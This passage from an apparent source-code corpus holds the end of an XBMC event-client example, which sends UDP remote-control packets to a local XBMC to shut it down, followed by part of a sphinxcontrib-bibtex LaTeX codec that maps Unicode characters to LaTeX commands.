# to XBMC in a queued fashion to shut it down.
# Queued button events are not repeatable.
# The basic idea is to create single packets and shoot them to XBMC
# The provided library implements some of the support commands and
# takes care of creating the actual packet. Using it is as simple
# as creating an object with the required constructor arguments and
# sending it through a socket.
# Currently, only keyboard keys are supported so the key codes used
# below are the same key codes used in guilib/common/SDLKeyboard.cpp
# In effect, anything that can be done with the keyboard can be done
# using the event client.
# import the XBMC client library
# NOTE: The library is not complete yet but is usable at this stage.
import sys
sys.path.append("../../lib/python")
from xbmcclient import *
from socket import *
def main():
import time
import sys
# connect to localhost, port 9777 using a UDP socket
# this only needs to be done once.
# by default this is where XBMC will be listening for incoming
# connections.
host = "localhost"
port = 9777
addr = (host, port)
sock = socket(AF_INET,SOCK_DGRAM)
# First packet must be HELO (no it's not a typo) and can contain an icon
# 'icon_type' can be one of ICON_NONE, ICON_PNG, ICON_JPG or ICON_GIF
packet = PacketHELO(devicename="Example Remote",
icon_type=ICON_PNG,
icon_file="../../icons/bluetooth.png")
packet.send(sock, addr)
# IMPORTANT: After a HELO packet is sent, the client needs to "ping" XBMC
# at least once every 60 seconds or else the client will time out.
# Every valid packet sent to XBMC acts as a ping, however if no valid
# packets NEED to be sent (eg. the user hasn't pressed a key in 50 seconds)
# then you can use the PacketPING class to send a ping packet (which is
# basically just an empty packet). See below.
# Once a client times out, it will need to reissue the HELO packet.
# Currently, since this is a unidirectional protocol, there is no way
# for the client to know if it has timed out.
# wait for notification window to close (in XBMC)
time.sleep(5)
# press 'S'
packet = PacketBUTTON(code='S', queue=1)
packet.send(sock, addr)
# wait for a few seconds
time.sleep(2)
# press the enter key (13 = enter)
packet = PacketBUTTON(code=13, queue=1)
packet.send(sock, addr)
# BYE is not required since XBMC would have shut down
packet = PacketBYE() # PacketPING if you want to ping
packet.send(sock, addr)
if __name__=="__main__":
main()
|
2014c2g19/2014c2g19 | refs/heads/master | exts/sphinxcontrib/bibtex/latex_codec.py | 38 | # -*- coding: utf-8 -*-
"""
Character translation utilities for LaTeX-formatted text
========================================================
Usage:
- unicode(string,'latex')
- ustring.decode('latex')
are both available just by letting "import latex" find this file.
- unicode(string,'latex+latin1')
- ustring.decode('latex+latin1')
where latin1 can be replaced by any other known encoding, also
become available by calling latex.register().
Copyright (c) 2003, 2008 David Eppstein
Copyright (c) 2011 Matthias C. M. Troffaes
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
from __future__ import print_function
import codecs
import collections
import re
from sphinxcontrib.bibtex import latex_lexer
def register():
"""Enable encodings of the form 'latex+x' where x describes another encoding.
Unicode characters are translated to or from x when possible, otherwise
expanded to latex.
"""
codecs.register(find_latex)
# returns the codec search function
# this is used if latex_codec.py were to be placed in stdlib
def getregentry():
"""Encodings module API."""
return find_latex('latex')
class LatexUnicodeTable:
"""Tabulates a translation between latex and unicode."""
def __init__(self, lexer):
self.lexer = lexer
self.unicode_map = {}
self.max_length = 0
self.latex_map = {}
self.register_all()
def register_all(self):
# TODO complete this list
# register special symbols
self.register(u'\N{EN DASH}', b'--')
self.register(u'\N{EN DASH}', b'\\textendash')
self.register(u'\N{EM DASH}', b'---')
self.register(u'\N{EM DASH}', b'\\textemdash')
self.register(u'\N{LEFT SINGLE QUOTATION MARK}', b'`', decode=False)
self.register(u'\N{RIGHT SINGLE QUOTATION MARK}', b"'", decode=False)
self.register(u'\N{LEFT DOUBLE QUOTATION MARK}', b'``')
self.register(u'\N{RIGHT DOUBLE QUOTATION MARK}', b"''")
self.register(u'\N{DAGGER}', b'\\dag')
self.register(u'\N{DOUBLE DAGGER}', b'\\ddag')
self.register(u'\N{BULLET}', b'\\bullet', mode='math')
self.register(u'\N{BULLET}', b'\\textbullet', package='textcomp')
self.register(u'\N{NUMBER SIGN}', b'\\#')
self.register(u'\N{AMPERSAND}', b'\\&')
self.register(u'\N{NO-BREAK SPACE}', b'~')
self.register(u'\N{INVERTED EXCLAMATION MARK}', b'!`')
self.register(u'\N{CENT SIGN}', b'\\not{c}')
self.register(u'\N{POUND SIGN}', b'\\pounds')
self.register(u'\N{POUND SIGN}', b'\\textsterling', package='textcomp')
self.register(u'\N{SECTION SIGN}', b'\\S')
self.register(u'\N{DIAERESIS}', b'\\"{}')
self.register(u'\N{NOT SIGN}', b'\\neg')
self.register(u'\N{SOFT HYPHEN}', b'\\-')
self.register(u'\N{MACRON}', b'\\={}')
self.register(u'\N{DEGREE SIGN}', b'^\\circ', mode='math')
self.register(u'\N{DEGREE SIGN}', b'\\textdegree', package='textcomp')
self.register(u'\N{PLUS-MINUS SIGN}', b'\\pm', mode='math')
self.register(u'\N{PLUS-MINUS SIGN}', b'\\textpm', package='textcomp')
self.register(u'\N{SUPERSCRIPT TWO}', b'^2', mode='math')
self.register(u'\N{SUPERSCRIPT TWO}', b'\\texttwosuperior', package='textcomp')
self.register(u'\N{SUPERSCRIPT THREE}', b'^3', mode='math')
self.register(u'\N{SUPERSCRIPT THREE}', b'\\textthreesuperior', package='textcomp')
self.register(u'\N{ACUTE ACCENT}', b"\\'{}")
self.register(u'\N{MICRO SIGN}', b'\\mu', mode='math')
self.register(u'\N{MICRO SIGN}', b'\\micro', package='gensymb')
self.register(u'\N{PILCROW SIGN}', b'\\P')
self.register(u'\N{MIDDLE DOT}', b'\\cdot', mode='math')
self.register(u'\N{MIDDLE DOT}', b'\\textperiodcentered', package='textcomp')
self.register(u'\N{CEDILLA}', b'\\c{}')
self.register(u'\N{SUPERSCRIPT ONE}', b'^1', mode='math')
self.register(u'\N{SUPERSCRIPT ONE}', b'\\textonesuperior', package='textcomp')
self.register(u'\N{INVERTED QUESTION MARK}', b'?`')
self.register(u'\N{LATIN CAPITAL LETTER A WITH GRAVE}', b'\\`A')
self.register(u'\N{LATIN CAPITAL LETTER A WITH CIRCUMFLEX}', b'\\^A')
self.register(u'\N{LATIN CAPITAL LETTER A WITH TILDE}', b'\\~A')
self.register(u'\N{LATIN CAPITAL LETTER A WITH DIAERESIS}', b'\\"A')
self.register(u'\N{LATIN CAPITAL LETTER A WITH RING ABOVE}', b'\\AA')
self.register(u'\N{LATIN CAPITAL LETTER AE}', b'\\AE')
self.register(u'\N{LATIN CAPITAL LETTER C WITH CEDILLA}', b'\\c C')
self.register(u'\N{LATIN CAPITAL LETTER E WITH GRAVE}', b'\\`E')
self.register(u'\N{LATIN CAPITAL LETTER E WITH ACUTE}', b"\\'E")
self.register(u'\N{LATIN CAPITAL LETTER E WITH CIRCUMFLEX}', b'\\^E')
self.register(u'\N{LATIN CAPITAL LETTER E WITH DIAERESIS}', b'\\"E')
self.register(u'\N{LATIN CAPITAL LETTER I WITH GRAVE}', b'\\`I')
self.register(u'\N{LATIN CAPITAL LETTER I WITH CIRCUMFLEX}', b'\\^I')
self.register(u'\N{LATIN CAPITAL LETTER I WITH DIAERESIS}', b'\\"I')
self.register(u'\N{LATIN CAPITAL LETTER N WITH TILDE}', b'\\~N')
self.register(u'\N{LATIN CAPITAL LETTER O WITH GRAVE}', b'\\`O')
self.register(u'\N{LATIN CAPITAL LETTER O WITH ACUTE}', b"\\'O")
self.register(u'\N{LATIN CAPITAL LETTER O WITH CIRCUMFLEX}', b'\\^O')
self.register(u'\N{LATIN CAPITAL LETTER O WITH TILDE}', b'\\~O')
self.register(u'\N{LATIN CAPITAL LETTER O WITH DIAERESIS}', b'\\"O')
self.register(u'\N{MULTIPLICATION SIGN}', b'\\times', mode='math')
self.register(u'\N{LATIN CAPITAL LETTER O WITH STROKE}', b'\\O')
self.register(u'\N{LATIN CAPITAL LETTER U WITH GRAVE}', b'\\`U')
self.register(u'\N{LATIN CAPITAL LETTER U WITH ACUTE}', b"\\'U")
self.register(u'\N{LATIN CAPITAL LETTER U WITH CIRCUMFLEX}', b'\\^U')
self.register(u'\N{LATIN CAPITAL LETTER U WITH DIAERESIS}', b'\\"U')
self.register(u'\N{LATIN CAPITAL LETTER Y WITH ACUTE}', b"\\'Y")
self.register(u'\N{LATIN SMALL LETTER SHARP S}', b'\\ss')
self.register(u'\N{LATIN SMALL LETTER A WITH GRAVE}', b'\\`a')
self.register(u'\N{LATIN SMALL LETTER A WITH ACUTE}', b"\\'a")
self.register(u'\N{LATIN SMALL LETTER A WITH CIRCUMFLEX}', b'\\^a')
self.register(u'\N{LATIN SMALL LETTER A WITH TILDE}', b'\\~a')
self.register(u'\N{LATIN SMALL LETTER A WITH DIAERESIS}', b'\\"a')
self.register(u'\N{LATIN SMALL LETTER A WITH RING ABOVE}', b'\\aa')
self.register(u'\N{LATIN SMALL LETTER AE}', b'\\ae')
self.register(u'\N{LATIN SMALL LETTER C WITH CEDILLA}', b'\\c c')
self.register(u'\N{LATIN SMALL LETTER E WITH GRAVE}', b'\\`e')
self.register(u'\N{LATIN SMALL LETTER E WITH ACUTE}', b"\\'e")
self.register(u'\N{LATIN SMALL LETTER E WITH CIRCUMFLEX}', b'\\^e')
self.register(u'\N{LATIN SMALL LETTER E WITH DIAERESIS}', b'\\"e')
self.register(u'\N{LATIN SMALL LETTER I WITH GRAVE}', b'\\`\\i')
self.register(u'\N{LATIN SMALL LETTER I WITH GRAVE}', b'\\`i')
self.register(u'\N{LATIN SMALL LETTER I WITH ACUTE}', b"\\'\\i")
self.register(u'\N{LATIN SMALL LETTER I WITH ACUTE}', b"\\'i")
self.register(u'\N{LATIN SMALL LETTER I WITH CIRCUMFLEX}', b'\\^\\i')
self.register(u'\N{LATIN SMALL LETTER I WITH CIRCUMFLEX}', b'\\^i')
self.register(u'\N{LATIN SMALL LETTER I WITH DIAERESIS}', b'\\"\\i')
self.register(u'\N{LATIN SMALL LETTER I WITH DIAERESIS}', b'\\"i')
self.register(u'\N{LATIN SMALL LETTER N WITH TILDE}', b'\\~n')
self.register(u'\N{LATIN SMALL LETTER O WITH GRAVE}', b'\\`o')
self.register(u'\N{LATIN SMALL LETTER O WITH ACUTE}', b"\\'o")
self.register(u'\N{LATIN SMALL LETTER O WITH CIRCUMFLEX}', b'\\^o')
self.register(u'\N{LATIN SMALL LETTER O WITH TILDE}', b'\\~o')
self.register(u'\N{LATIN SMALL LETTER O WITH DIAERESIS}', b'\\"o')
self.register(u'\N{DIVISION SIGN}', b'\\div', mode='math')
self.register(u'\N{LATIN SMALL LETTER O WITH STROKE}', b'\\o')
self.register(u'\N{LATIN SMALL LETTER U WITH GRAVE}', b'\\`u')
self.register(u'\N{LATIN SMALL LETTER U WITH ACUTE}', b"\\'u")
self.register(u'\N{LATIN SMALL LETTER U WITH CIRCUMFLEX}', b'\\^u')
self.register(u'\N{LATIN SMALL LETTER U WITH DIAERESIS}', b'\\"u')
self.register(u'\N{LATIN SMALL LETTER Y WITH ACUTE}', b"\\'y")
self.register(u'\N{LATIN SMALL LETTER Y WITH DIAERESIS}', b'\\"y')
self.register(u'\N{LATIN CAPITAL LETTER A WITH MACRON}', b'\\=A')
self.register(u'\N{LATIN SMALL LETTER A WITH MACRON}', b'\\=a')
self.register(u'\N{LATIN CAPITAL LETTER A WITH BREVE}', b'\\u A')
self.register(u'\N{LATIN SMALL LETTER A WITH BREVE}', b'\\u a')
self.register(u'\N{LATIN CAPITAL LETTER A WITH OGONEK}', b'\\c A')
self.register(u'\N{LATIN SMALL LETTER A WITH OGONEK}', b'\\c a')
self.register(u'\N{LATIN CAPITAL LETTER C WITH ACUTE}', b"\\'C")
self.register(u'\N{LATIN SMALL LETTER C WITH ACUTE}', b"\\'c")
self.register(u'\N{LATIN CAPITAL LETTER C WITH CIRCUMFLEX}', b'\\^C')
self.register(u'\N{LATIN SMALL LETTER C WITH CIRCUMFLEX}', b'\\^c')
self.register(u'\N{LATIN CAPITAL LETTER C WITH DOT ABOVE}', b'\\.C')
self.register(u'\N{LATIN SMALL LETTER C WITH DOT ABOVE}', b'\\.c')
self.register(u'\N{LATIN CAPITAL LETTER C WITH CARON}', b'\\v C')
self.register(u'\N{LATIN SMALL LETTER C WITH CARON}', b'\\v c')
self.register(u'\N{LATIN CAPITAL LETTER D WITH CARON}', b'\\v D')
self.register(u'\N{LATIN SMALL LETTER D WITH CARON}', b'\\v d')
self.register(u'\N{LATIN CAPITAL LETTER E WITH MACRON}', b'\\=E')
self.register(u'\N{LATIN SMALL LETTER E WITH MACRON}', b'\\=e')
self.register(u'\N{LATIN CAPITAL LETTER E WITH BREVE}', b'\\u E')
self.register(u'\N{LATIN SMALL LETTER E WITH BREVE}', b'\\u e')
self.register(u'\N{LATIN CAPITAL LETTER E WITH DOT ABOVE}', b'\\.E')
self.register(u'\N{LATIN SMALL LETTER E WITH DOT ABOVE}', b'\\.e')
self.register(u'\N{LATIN CAPITAL LETTER E WITH OGONEK}', b'\\c E')
self.register(u'\N{LATIN SMALL LETTER E WITH OGONEK}', b'\\c e')
self.register(u'\N{LATIN CAPITAL LETTER E WITH CARON}', b'\\v E')
self.register(u'\N{LATIN SMALL LETTER E WITH CARON}', b'\\v e')
self.register(u'\N{LATIN CAPITAL LETTER G WITH CIRCUMFLEX}', b'\\^G')
self.register(u'\N{LATIN SMALL LETTER G WITH CIRCUMFLEX}', b'\\^g')
self.register(u'\N{LATIN CAPITAL LETTER G WITH BREVE}', b'\\u G')
self.register(u'\N{LATIN SMALL LETTER G WITH BREVE}', b'\\u g')
self.register(u'\N{LATIN CAPITAL LETTER G WITH DOT ABOVE}', b'\\.G')
self.register(u'\N{LATIN SMALL LETTER G WITH DOT ABOVE}', b'\\.g')
self.register(u'\N{LATIN CAPITAL LETTER G WITH CEDILLA}', b'\\c G')
self.register(u'\N{LATIN SMALL LETTER G WITH CEDILLA}', b'\\c g')
self.register(u'\N{LATIN CAPITAL LETTER H WITH CIRCUMFLEX}', b'\\^H')
self.register(u'\N{LATIN SMALL LETTER H WITH CIRCUMFLEX}', b'\\^h')
self.register(u'\N{LATIN CAPITAL LETTER I WITH TILDE}', b'\\~I')
self.register(u'\N{LATIN SMALL LETTER I WITH TILDE}', b'\\~\\i')
self.register(u'\N{LATIN SMALL LETTER I WITH TILDE}', b'\\~i')
self.register(u'\N{LATIN CAPITAL LETTER I WITH MACRON}', b'\\=I')
self.register(u'\N{LATIN SMALL LETTER I WITH MACRON}', b'\\=\\i')
self.register(u'\N{LATIN SMALL LETTER I WITH MACRON}', b'\\=i')
self.register(u'\N{LATIN CAPITAL LETTER I WITH BREVE}', b'\\u I')
self.register(u'\N{LATIN SMALL LETTER I WITH BREVE}', b'\\u\\i')
self.register(u'\N{LATIN SMALL LETTER I WITH BREVE}', b'\\u i')
self.register(u'\N{LATIN CAPITAL LETTER I WITH OGONEK}', b'\\c I')
self.register(u'\N{LATIN SMALL LETTER I WITH OGONEK}', b'\\c i')
self.register(u'\N{LATIN CAPITAL LETTER I WITH DOT ABOVE}', b'\\.I')
self.register(u'\N{LATIN SMALL LETTER DOTLESS I}', b'\\i')
self.register(u'\N{LATIN CAPITAL LIGATURE IJ}', b'IJ', decode=False)
self.register(u'\N{LATIN SMALL LIGATURE IJ}', b'ij', decode=False)
self.register(u'\N{LATIN CAPITAL LETTER J WITH CIRCUMFLEX}', b'\\^J')
self.register(u'\N{LATIN SMALL LETTER J WITH CIRCUMFLEX}', b'\\^\\j')
self.register(u'\N{LATIN SMALL LETTER J WITH CIRCUMFLEX}', b'\\^j')
self.register(u'\N{LATIN CAPITAL LETTER K WITH CEDILLA}', b'\\c K')
self.register(u'\N{LATIN SMALL LETTER K WITH CEDILLA}', b'\\c k')
self.register(u'\N{LATIN CAPITAL LETTER L WITH ACUTE}', b"\\'L")
self.register(u'\N{LATIN SMALL LETTER L WITH ACUTE}', b"\\'l")
self.register(u'\N{LATIN CAPITAL LETTER L WITH CEDILLA}', b'\\c L')
self.register(u'\N{LATIN SMALL LETTER L WITH CEDILLA}', b'\\c l')
self.register(u'\N{LATIN CAPITAL LETTER L WITH CARON}', b'\\v L')
self.register(u'\N{LATIN SMALL LETTER L WITH CARON}', b'\\v l')
self.register(u'\N{LATIN CAPITAL LETTER L WITH STROKE}', b'\\L')
self.register(u'\N{LATIN SMALL LETTER L WITH STROKE}', b'\\l')
self.register(u'\N{LATIN CAPITAL LETTER N WITH ACUTE}', b"\\'N")
self.register(u'\N{LATIN SMALL LETTER N WITH ACUTE}', b"\\'n")
self.register(u'\N{LATIN CAPITAL LETTER N WITH CEDILLA}', b'\\c N')
self.register(u'\N{LATIN SMALL LETTER N WITH CEDILLA}', b'\\c n')
self.register(u'\N{LATIN CAPITAL LETTER N WITH CARON}', b'\\v N')
self.register(u'\N{LATIN SMALL LETTER N WITH CARON}', b'\\v n')
self.register(u'\N{LATIN CAPITAL LETTER O WITH MACRON}', b'\\=O')
self.register(u'\N{LATIN SMALL LETTER O WITH MACRON}', b'\\=o')
self.register(u'\N{LATIN CAPITAL LETTER O WITH BREVE}', b'\\u O')
self.register(u'\N{LATIN SMALL LETTER O WITH BREVE}', b'\\u o')
self.register(u'\N{LATIN CAPITAL LETTER O WITH DOUBLE ACUTE}', b'\\H O')
self.register(u'\N{LATIN SMALL LETTER O WITH DOUBLE ACUTE}', b'\\H o')
self.register(u'\N{LATIN CAPITAL LIGATURE OE}', b'\\OE')
self.register(u'\N{LATIN SMALL LIGATURE OE}', b'\\oe')
self.register(u'\N{LATIN CAPITAL LETTER R WITH ACUTE}', b"\\'R")
self.register(u'\N{LATIN SMALL LETTER R WITH ACUTE}', b"\\'r")
self.register(u'\N{LATIN CAPITAL LETTER R WITH CEDILLA}', b'\\c R')
self.register(u'\N{LATIN SMALL LETTER R WITH CEDILLA}', b'\\c r')
self.register(u'\N{LATIN CAPITAL LETTER R WITH CARON}', b'\\v R')
self.register(u'\N{LATIN SMALL LETTER R WITH CARON}', b'\\v r')
self.register(u'\N{LATIN CAPITAL LETTER S WITH ACUTE}', b"\\'S")
self.register(u'\N{LATIN SMALL LETTER S WITH ACUTE}', b"\\'s")
self.register(u'\N{LATIN CAPITAL LETTER S WITH CIRCUMFLEX}', b'\\^S')
self.register(u'\N{LATIN SMALL LETTER S WITH CIRCUMFLEX}', b'\\^s')
self.register(u'\N{LATIN CAPITAL LETTER S WITH CEDILLA}', b'\\c S')
self.register(u'\N{LATIN SMALL LETTER S WITH CEDILLA}', b'\\c s')
self.register(u'\N{LATIN CAPITAL LETTER S WITH CARON}', b'\\v S')
self.register(u'\N{LATIN SMALL LETTER S WITH CARON}', b'\\v s')
self.register(u'\N{LATIN CAPITAL LETTER T WITH CEDILLA}', b'\\c T')
self.register(u'\N{LATIN SMALL LETTER T WITH CEDILLA}', b'\\c t')
self.register(u'\N{LATIN CAPITAL LETTER T WITH CARON}', b'\\v T')
self.register(u'\N{LATIN SMALL LETTER T WITH CARON}', b'\\v t')
self.register(u'\N{LATIN CAPITAL LETTER U WITH TILDE}', b'\\~U')
self.register(u'\N{LATIN SMALL LETTER U WITH TILDE}', b'\\~u')
self.register(u'\N{LATIN CAPITAL LETTER U WITH MACRON}', b'\\=U')
self.register(u'\N{LATIN SMALL LETTER U WITH MACRON}', b'\\=u')
self.register(u'\N{LATIN CAPITAL LETTER U WITH BREVE}', b'\\u U')
self.register(u'\N{LATIN SMALL LETTER U WITH BREVE}', b'\\u u')
self.register(u'\N{LATIN CAPITAL LETTER U WITH RING ABOVE}', b'\\r U')
self.register(u'\N{LATIN SMALL LETTER U WITH RING ABOVE}', b'\\r u')
self.register(u'\N{LATIN CAPITAL LETTER U WITH DOUBLE ACUTE}', b'\\H U')
self.register(u'\N{LATIN SMALL LETTER U WITH DOUBLE ACUTE}', b'\\H u')
self.register(u'\N{LATIN CAPITAL LETTER U WITH OGONEK}', b'\\c U')
self.register(u'\N{LATIN SMALL LETTER U WITH OGONEK}', b'\\c u')
self.register(u'\N{LATIN CAPITAL LETTER W WITH CIRCUMFLEX}', b'\\^W')
self.register(u'\N{LATIN SMALL LETTER W WITH CIRCUMFLEX}', b'\\^w')
self.register(u'\N{LATIN CAPITAL LETTER Y WITH CIRCUMFLEX}', b'\\^Y')
self.register(u'\N{LATIN SMALL LETTER Y WITH CIRCUMFLEX}', b'\\^y')
self.register(u'\N{LATIN CAPITAL LETTER Y WITH DIAERESIS}', b'\\"Y')
self.register(u'\N{LATIN CAPITAL LETTER Z WITH ACUTE}', b"\\'Z")
self.register(u'\N{LATIN SMALL LETTER Z WITH ACUTE}', b"\\'Z")
self.register(u'\N{LATIN CAPITAL LETTER Z WITH DOT ABOVE}', b'\\.Z')
self.register(u'\N{LATIN SMALL LETTER Z WITH DOT ABOVE}', b'\\.Z')
self.register(u'\N{LATIN CAPITAL LETTER Z WITH CARON}', b'\\v Z')
self.register(u'\N{LATIN SMALL LETTER Z WITH CARON}', b'\\v z')
self.register(u'\N{LATIN CAPITAL LETTER DZ WITH CARON}', b'D\\v Z')
self.register(u'\N{LATIN CAPITAL LETTER D WITH SMALL LETTER Z WITH CARON}', b'D\\v z')
self.register(u'\N{LATIN SMALL LETTER DZ WITH CARON}', b'd\\v z')
self.register(u'\N{LATIN CAPITAL LETTER LJ}', b'LJ', decode=False)
self.register(u'\N{LATIN CAPITAL LETTER L WITH SMALL LETTER J}', b'Lj', decode=False)
self.register(u'\N{LATIN SMALL LETTER LJ}', b'lj', decode=False)
self.register(u'\N{LATIN CAPITAL LETTER NJ}', b'NJ', decode=False)
self.register(u'\N{LATIN CAPITAL LETTER N WITH SMALL LETTER J}', b'Nj', decode=False)
self.register(u'\N{LATIN SMALL LETTER NJ}', b'nj', decode=False)
self.register(u'\N{LATIN CAPITAL LETTER A WITH CARON}', b'\\v A')
self.register(u'\N{LATIN SMALL LETTER A WITH CARON}', b'\\v a')
self.register(u'\N{LATIN CAPITAL LETTER I WITH CARON}', b'\\v I')
self.register(u'\N{LATIN SMALL LETTER I WITH CARON}', b'\\v\\i')
self.register(u'\N{LATIN CAPITAL LETTER O WITH CARON}', b'\\v O')
self.register(u'\N{LATIN SMALL LETTER O WITH CARON}', b'\\v o')
self.register(u'\N{LATIN CAPITAL LETTER U WITH CARON}', b'\\v U')
self.register(u'\N{LATIN SMALL LETTER U WITH CARON}', b'\\v u')
self.register(u'\N{LATIN CAPITAL LETTER G WITH CARON}', b'\\v G')
self.register(u'\N{LATIN SMALL LETTER G WITH CARON}', b'\\v g')
self.register(u'\N{LATIN CAPITAL LETTER K WITH CARON}', b'\\v K')
self.register(u'\N{LATIN SMALL LETTER K WITH CARON}', b'\\v k')
self.register(u'\N{LATIN CAPITAL LETTER O WITH OGONEK}', b'\\c O')
self.register(u'\N{LATIN SMALL LETTER O WITH OGONEK}', b'\\c o')
self.register(u'\N{LATIN SMALL LETTER J WITH CARON}', b'\\v\\j')
self.register(u'\N{LATIN CAPITAL LETTER DZ}', b'DZ')
self.register(u'\N{LATIN CAPITAL LETTER D WITH SMALL LETTER Z}', b'Dz', decode=False)
self.register(u'\N{LATIN SMALL LETTER DZ}', b'dz', decode=False)
self.register(u'\N{LATIN CAPITAL LETTER G WITH ACUTE}', b"\\'G")
self.register(u'\N{LATIN SMALL LETTER G WITH ACUTE}', b"\\'g")
self.register(u'\N{LATIN CAPITAL LETTER AE WITH ACUTE}', b"\\'\\AE")
self.register(u'\N{LATIN SMALL LETTER AE WITH ACUTE}', b"\\'\\ae")
self.register(u'\N{LATIN CAPITAL LETTER O WITH STROKE AND ACUTE}', b"\\'\\O")
self.register(u'\N{LATIN SMALL LETTER O WITH STROKE AND ACUTE}', b"\\'\\o")
self.register(u'\N{PARTIAL DIFFERENTIAL}', b'\\partial', mode='math')
self.register(u'\N{N-ARY PRODUCT}', b'\\prod', mode='math')
self.register(u'\N{N-ARY SUMMATION}', b'\\sum', mode='math')
self.register(u'\N{SQUARE ROOT}', b'\\surd', mode='math')
self.register(u'\N{INFINITY}', b'\\infty', mode='math')
self.register(u'\N{INTEGRAL}', b'\\int', mode='math')
self.register(u'\N{INTERSECTION}', b'\\cap', mode='math')
self.register(u'\N{UNION}', b'\\cup', mode='math')
self.register(u'\N{RIGHTWARDS ARROW}', b'\\rightarrow', mode='math')
self.register(u'\N{RIGHTWARDS DOUBLE ARROW}', b'\\Rightarrow', mode='math')
self.register(u'\N{LEFTWARDS ARROW}', b'\\leftarrow', mode='math')
self.register(u'\N{LEFTWARDS DOUBLE ARROW}', b'\\Leftarrow', mode='math')
self.register(u'\N{LOGICAL OR}', b'\\vee', mode='math')
self.register(u'\N{LOGICAL AND}', b'\\wedge', mode='math')
self.register(u'\N{ALMOST EQUAL TO}', b'\\approx', mode='math')
self.register(u'\N{NOT EQUAL TO}', b'\\neq', mode='math')
self.register(u'\N{LESS-THAN OR EQUAL TO}', b'\\leq', mode='math')
self.register(u'\N{GREATER-THAN OR EQUAL TO}', b'\\geq', mode='math')
self.register(u'\N{MODIFIER LETTER CIRCUMFLEX ACCENT}', b'\\^{}')
self.register(u'\N{CARON}', b'\\v{}')
self.register(u'\N{BREVE}', b'\\u{}')
self.register(u'\N{DOT ABOVE}', b'\\.{}')
self.register(u'\N{RING ABOVE}', b'\\r{}')
self.register(u'\N{OGONEK}', b'\\c{}')
self.register(u'\N{SMALL TILDE}', b'\\~{}')
self.register(u'\N{DOUBLE ACUTE ACCENT}', b'\\H{}')
self.register(u'\N{LATIN SMALL LIGATURE FI}', b'fi', decode=False)
self.register(u'\N{LATIN SMALL LIGATURE FL}', b'fl', decode=False)
self.register(u'\N{LATIN SMALL LIGATURE FF}', b'ff', decode=False)
self.register(u'\N{GREEK SMALL LETTER ALPHA}', b'\\alpha', mode='math')
self.register(u'\N{GREEK SMALL LETTER BETA}', b'\\beta', mode='math')
self.register(u'\N{GREEK SMALL LETTER GAMMA}', b'\\gamma', mode='math')
self.register(u'\N{GREEK SMALL LETTER DELTA}', b'\\delta', mode='math')
self.register(u'\N{GREEK SMALL LETTER EPSILON}', b'\\epsilon', mode='math')
self.register(u'\N{GREEK SMALL LETTER ZETA}', b'\\zeta', mode='math')
self.register(u'\N{GREEK SMALL LETTER ETA}', b'\\eta', mode='math')
self.register(u'\N{GREEK SMALL LETTER THETA}', b'\\theta', mode='math')
self.register(u'\N{GREEK SMALL LETTER IOTA}', b'\\iota', mode='math')
self.register(u'\N{GREEK SMALL LETTER KAPPA}', b'\\kappa', mode='math')
self.register(u'\N{GREEK SMALL LETTER LAMDA}', b'\\lambda', mode='math') # LAMDA not LAMBDA
self.register(u'\N{GREEK SMALL LETTER MU}', b'\\mu', mode='math')
self.register(u'\N{GREEK SMALL LETTER NU}', b'\\nu', mode='math')
self.register(u'\N{GREEK SMALL LETTER XI}', b'\\xi', mode='math')
self.register(u'\N{GREEK SMALL LETTER OMICRON}', b'\\omicron', mode='math')
self.register(u'\N{GREEK SMALL LETTER PI}', b'\\pi', mode='math')
self.register(u'\N{GREEK SMALL LETTER RHO}', b'\\rho', mode='math')
self.register(u'\N{GREEK SMALL LETTER SIGMA}', b'\\sigma', mode='math')
self.register(u'\N{GREEK SMALL LETTER TAU}', b'\\tau', mode='math')
self.register(u'\N{GREEK SMALL LETTER UPSILON}', b'\\upsilon', mode='math')
self.register(u'\N{GREEK SMALL LETTER PHI}', b'\\phi', mode='math')
self.register(u'\N{GREEK SMALL LETTER CHI}', b'\\chi', mode='math')
self.register(u'\N{GREEK SMALL LETTER PSI}', b'\\psi', mode='math')
self.register(u'\N{GREEK SMALL LETTER OMEGA}', b'\\omega', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER ALPHA}', b'\\Alpha', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER BETA}', b'\\Beta', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER GAMMA}', b'\\Gamma', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER DELTA}', b'\\Delta', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER EPSILON}', b'\\Epsilon', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER ZETA}', b'\\Zeta', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER ETA}', b'\\Eta', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER THETA}', b'\\Theta', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER IOTA}', b'\\Iota', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER KAPPA}', b'\\Kappa', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER LAMDA}', b'\\Lambda', mode='math') # LAMDA not LAMBDA
self.register(u'\N{GREEK CAPITAL LETTER MU}', b'\\Mu', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER NU}', b'\\Nu', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER XI}', b'\\Xi', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER OMICRON}', b'\\Omicron', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER PI}', b'\\Pi', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER RHO}', b'\\Rho', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER SIGMA}', b'\\Sigma', mode='math')
